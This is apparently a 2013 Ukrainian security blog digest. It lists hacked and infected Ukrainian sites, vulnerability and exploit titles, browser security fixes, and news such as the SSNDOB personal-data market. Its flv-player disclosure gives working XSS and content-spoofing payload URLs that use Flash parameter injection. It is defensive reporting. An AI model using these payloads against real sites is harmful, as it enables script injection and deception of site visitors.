Websecurity - Веб безпека

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.dec.gov.ua (хакером HighTech) - 04.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://book.rekord.gov.ua (хакером SultanHaikal) - 06.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://kievlyanenews.com.ua (хакером dr.m1st3r)
• http://веселка.com.ua (хакером dr.m1st3r)
• http://blog.arhstudio-f.com (хакером dr.m1st3r)

В даній добірці уразливості в веб додатках:

• Polycom - Command Shell Grants System-Level Access (деталі)
• vtiger CRM <= 5.4.0 (customerportal.php) Two Local File Inclusion Vulnerabilities (деталі)
• Polycom - Firmware Update Command Injection (деталі)
• SilverStripe(R) Information Exposure Through Query Strings in GET Request (CWE-598) (деталі)
• Polycom - H.323 CDR Database SQL Injection (деталі)
• Joomla core <= 3.1.5 reflected XSS vulnerability (деталі)
• Polycom - H.323 Format String Vulnerability (деталі)
• Vulnerabilities in owncloud (деталі)
• HP XP P9000 Command View Advanced Edition Suite Products, Remote Disclosure of Information (деталі)
• Joomla com_sectionex v2.5.96 SQL Injection vulnerabilities (деталі)

У жовтні, 01.10.2013, через півтора місяці після виходу Google Chrome 29, вийшов Google Chrome 30.

В браузері зроблено декілька нововведень та виправлені помилки. А також виправлено 19 уразливостей, 10 з яких позначені як небезпечні, а 6 як помірні. Загальна кількість дірок менша, зате кількість небезпечних дірок більша ніж у попередній версії браузера. А з врахуванням уразливостей знайдених під час внутрішнього аудиту, то це рекорд серед усіх релізів.

Уразливості, що мають статус небезпечних, пов’язані зі звертанням до вже звільненої області пам’яті в коді DOM, рендеринга inline-блоків, завантаження ресурсів, розбору XSLT і XML, реалізації PPAPI, діалозі вибору кольору на платформі Windows. Також усунуте пошкодження пам’яті в движку V8 і можливість підміни вмісту адресного рядка. Окремо згадується виправлення ще 27 уразливостей, виявлених у результаті внутрішнього аудиту, 17 з яких позначені як небезпечні.

• Выпуск web-браузера Chrome 30 (деталі)

Виявлена можливість обходу перевірки сертифіката в Python.

Уразливі версії: Python 2.7, Python 3.4.

Некоректна обробка NULL-символів.

• Vulnerability in Python (деталі)

В даній добірці експлоіти в веб додатках:

• Tenda W309R Router 5.07.46 - Configuration Disclosure (деталі)
• Asus RT-N66U 3.0.0.4.374_720 - CSRF Vulnerability (деталі)
• Western Digital Arkeia Remote Code Execution Vulnerability (деталі)
• freeFTPd 1.0.10 PASS Command SEH Overflow Vulnerability (деталі)
• GLPI install.php Remote Command Execution Vulnerability (деталі)

03.08.2013

У травні, 22.05.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в flv-player. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

08.10.2013

XSS (через Flash Injection) (WASC-08):

http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&skin=xss.swf

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

Content Spoofing (Flash Injection) (WASC-12):

http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&skin=http://site2/1.swf

Content Spoofing (Content Injection) (WASC-12):

http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv
http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&pic=http://site2/1.jpg

Content Spoofing (HTML Injection) (WASC-12):

http://site/path/uflvplayer_500x375.swf?way=http://site&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E

XSS (WASC-08):

http://site/path/uflvplayer_500x375.swf?way=http://site&comment=+%3Cimg%20src=%27xss.swf%27%3E

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені. Також можлива Strictly social XSS атака.

Уразливі flv-player 3.5 та попередні версії.

Виявлені численні уразливості безпеки в Mozilla Firefox, Thunderbird та Seamonkey.

Уразливі продукти: Mozilla Firefox 23.0, Thunderbird 23.0, Seamonkey 2.20.

Пошкодження пам’яті, цілочислені переповнення, підвищення привілеїв, виконання коду, обхід захисту, витік інформації.

• Firefox for Android - Same-origin bypass through symbolic links (деталі)
• Mozilla Foundation Security Advisory 2013-76 (деталі)
• Mozilla Foundation Security Advisory 2013-77 (деталі)
• Mozilla Foundation Security Advisory 2013-78 (деталі)
• Mozilla Foundation Security Advisory 2013-79 (деталі)
• Mozilla Foundation Security Advisory 2013-80 (деталі)
• Mozilla Foundation Security Advisory 2013-81 (деталі)
• Mozilla Foundation Security Advisory 2013-82 (деталі)
• Mozilla Foundation Security Advisory 2013-83 (деталі)
• Mozilla Foundation Security Advisory 2013-84 (деталі)
• Mozilla Foundation Security Advisory 2013-85 (деталі)
• Mozilla Foundation Security Advisory 2013-86 (деталі)
• Mozilla Foundation Security Advisory 2013-87 (деталі)
• Mozilla Foundation Security Advisory 2013-88 (деталі)
• Mozilla Foundation Security Advisory 2013-89 (деталі)
• Mozilla Foundation Security Advisory 2013-90 (деталі)
• Mozilla Foundation Security Advisory 2013-91 (деталі)
• Mozilla Foundation Security Advisory 2013-92 (деталі)

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://kharkivoda.gov.ua - інфікований державний сайт - інфекція була виявлена 14.08.2013. Зараз сайт не входить до переліку підозрілих.
• http://nokino.com.ua - інфекція була виявлена 15.09.2013. Зараз сайт не входить до переліку підозрілих.
• http://vanilin.com.ua - інфекція була виявлена 08.10.2013. Зараз сайт входить до переліку підозрілих.
• http://i.ua - інфекція була виявлена 08.10.2013. Зараз сайт не входить до переліку підозрілих.
• http://a-counter.com - інфекція була виявлена 09.10.2013. Зараз сайт не входить до переліку підозрілих.

В даній добірці уразливості в веб додатках:

• Varnish 2.1.5 DoS in STV_alloc() while parsing Content-Length header (деталі)
• Multiple vulnerabilities in phpMyAdmin (деталі)
• MojoPortal XSS (деталі)
• Multiple XSS Vulnerabilities in Jahia xCM (деталі)
• Varnish 2.1.5, 3.0.3 DoS in VRY_Create() while parsing Vary header (деталі)
• SQL Injection in Cotonti (деталі)
• vtiger CRM <= 5.4.0 (SOAP Services) Authentication Bypass Vulnerability (деталі)
• Samsung TV DoS (possible overflow) via SOAPACTION (деталі)
• vtiger CRM <= 5.4.0 (vtigerolservice.php) PHP Code Injection Vulnerability (деталі)
• vtiger CRM <= 5.4.0 (SOAP Services) Multiple SQL Injection Vulnerabilities (деталі)

За повідомленням www.xakep.ru, персональні дані всіх американців можна купити.

Брайан Кребс після семи місяців розслідування здійснив чергове голосне викриття. Він знайшов, що на підпільних хакерських форумах можна купити інформацію про будь-якого американця, включаючи номер соціального страхування, день народження, номер водійського посвідчення і т.д. Ціни різняться від 50 центів до $2,50 за персональну інформацію і від $5 до $15 за перевірку кредитної історії і більш докладні біографічні дані.

Брайан перевірив, що інформація дійсно правдива, і продавець під ніком SSNDOB реально має доступ до справжніх державних і комерційних баз даних про резидентів США.

За повідомленням www.bbc.co.uk, у Британії створять нову службу по боротьбі з кіберзлочинністю.

Міністр оборони Великобританії заявив, що для того, щоб зміцнити національну безпеку, у країні буде створена нова служба, що буде бороти з кіберзлочинністю.

При створенні нового Об’єднаного відділу по боротьбі з кіберзлочинністю, сотні резервістів, що є фахівцями з комп’ютерних технологій, будуть залучені до роботи разом зі штатними працівниками.

За повідомленням www.opennet.ru, небажання користувачів мігрувати на Java 7 стає серйозною загрозою безпеки.

Компанія Trend Micro опублікувала попередження про виникнення небезпечної ситуації, пов’язаної з припиненням випуску оновлень для Java 6. Незважаючи на те, що гілка Java 6 досягла кінця свого життєвого циклу в лютому і публічні оновлення більше не виходять, біля половини користувачів продовжують користуватися Java 6. З моменту останнього оновлення уже виявлено декілька критичних уразливостей, які торкаються Java 6, що створює серйозну загрозу для сотень мільйонів користувачів, що не поспішають виконати оновлення до Java 7.

Найкращий варіант оновлення старих версій Java - це оновлення не до версії 7, а до ніякої версії . Тобто повне видалення з системи. Бо в Java 7 також знаходять уразливості, тому відмова від неї (зокрема від плагіна до браузера) є найбільш безпечним варіантом. Сам використовую цей підхід багато років і всім раджу.